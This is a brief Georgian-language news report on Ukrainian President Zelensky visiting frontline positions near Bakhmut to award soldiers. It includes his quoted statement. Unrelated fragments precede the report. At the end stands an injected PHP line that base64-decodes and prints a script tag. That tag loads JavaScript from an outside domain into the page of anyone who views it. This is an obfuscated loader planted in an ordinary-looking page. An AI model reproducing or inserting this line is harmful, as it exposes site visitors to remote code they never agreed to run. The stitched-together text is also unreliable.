celsiusi
ავერსი შნაიდერი
უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი ბახმუტთან უკრაინელი სამხედროების პოზიციებზე იმყოფებოდა. შესაბამის ინფორმაციას ზელენსკის ოფისი ავრცელებს.
„დონეცკის ოლქი. უკრაინელი სამხედროების მოწინავე პოზიციები ბახმუტის მიმართულებაზე. პატივი მაქვს, დღეს ვიმყოფებოდე აქ და დავაჯილდოო ჩვენი გმირები, ხელი ჩამოვართვა და მადლობა გადავუხადო ჩვენი სახელმწიფოს სუვერენიტეტის დაცვისთვის“, – ნათქვამია ზელენსკის განცხადებაში.
შეგახსენებთ, რომ ბახმუტი უკრაინის ფრონტზე ერთ-ერთი ყველაზე აქტიური შეტაკებების მიმართულებაა. დონეცკის ოლქის ქალაქ ბახმუტის აღებას რუსეთის ძალები თვეებია, ცდილობენ.
422
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");